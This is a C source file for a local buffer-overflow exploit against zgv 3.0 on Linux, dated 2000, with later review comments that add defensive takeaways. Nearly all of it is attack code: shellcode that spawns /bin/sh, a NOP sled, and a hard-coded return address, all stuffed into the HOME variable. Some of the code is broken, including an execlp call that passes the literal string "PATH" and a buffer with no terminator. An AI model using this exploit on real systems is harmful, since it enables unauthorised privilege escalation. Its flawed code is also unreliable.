Zgv 3.0 local exploit for Linux.
97a09fdb60023de0734f695a952ce7ceec2f4651602772ae2bbd81286136ebe7
/*
zgv 3.0 local linux sample exploit
by slash / buffer0verfl0w security
<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
Initial exploit version by Mixter <mixter@newyorkoffice.com>
*/
#include <stdio.h>
#include <stdlib.h>
#define NOPS 0x90 // Filler byte used for the padding in front of the payload (x86 single-byte no-op)
#define BUFLEN 1032 // Size in bytes of the array whose contents are placed in HOME
#define RETADDR 0xbffff574 // Hard-coded address guess; the author notes it must be changed per system
#define PATH "/usr/bin/zgv" // Path to the target program
// Payload bytes, labelled by the author as execve("/bin/sh").
// NOTE(review): the label is the author's; the bytes end in the literal
// string "/bin/sh" and the array is NUL-terminated by the compiler, which
// is what lets main() measure it with strlen().
char shellcode[]= // execve("/bin/sh");
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*
 * Builds an oversized value for the HOME environment variable and then
 * replaces the current process with the target program.
 *
 * Contents of buf after the three fill steps below:
 *   [ NOPS filler ][ shellcode ][ last 100 bytes: repeated retaddr ]
 *
 * What this shows about the target: the only attacker-controlled input is
 * HOME, so the flaw being exercised is presumably an unbounded copy of
 * $HOME into a fixed-size stack buffer inside zgv 3.0 -- the vulnerable
 * code is not part of this listing, confirm against the zgv source.
 *
 * Defensive takeaways:
 *  - Mitigation in the target: treat environment variables as untrusted
 *    input and bound every copy (length check or size-taking API).
 *  - Platform hardening: the technique depends on a fixed stack address
 *    (RETADDR) and on executing bytes stored in the environment, which is
 *    what address-space randomization and non-executable stacks remove.
 *  - Detection: a HOME value of roughly BUFLEN bytes containing
 *    non-printable bytes at process start is anomalous and loggable.
 *
 * NOTE(review): the listing relies on undefined behaviour in several
 * places (flagged inline) and is documented here as-is, not corrected.
 */
int main()
{
char buf[BUFLEN];
long retaddr = RETADDR;
int i;
printf("######################################\n");
printf("# zgv 3.0 local linux sample exploit #\n");
printf("# by slash / buffer0verfl0w security #\n");
printf("######################################\n");
printf("# Using return address 0x%lx\n",retaddr);
// NOTE(review): buf is still uninitialized here, so strlen(buf) is
// undefined behaviour and the printed number is not the real buffer size;
// %d also does not match the size_t that strlen returns.
printf("# Using buffer size %d\n", strlen(buf));
// Fill the whole array with copies of the return address.
// The stride of 4 assumes sizeof(long) == 4.
for (i = 0; i < BUFLEN; i += 4)
*(long *) &buf[i] = retaddr;
// Overwrite the front of the array with the NOPS filler byte, stopping
// short of the end by the shellcode length plus 100 bytes.
memset(buf, NOPS, BUFLEN - strlen(shellcode) - 100);
// Place the shellcode directly after the filler; the final 100 bytes
// keep the return-address copies written by the loop above.
memcpy(buf + (BUFLEN - strlen(shellcode) - 100), shellcode, strlen(shellcode));
// Export the array as HOME, overwriting any existing value.
// NOTE(review): nothing in this function writes a terminating NUL into
// buf, so setenv() reads it as a string without a guaranteed end.
setenv("HOME", buf, 1);
// Replace this process; the new program image inherits the environment
// set above. Reaching the return below means execlp() failed.
execlp("PATH", "zgv", 0);
return 0;
}
/* www.hack.co.za [5 September 2000]*/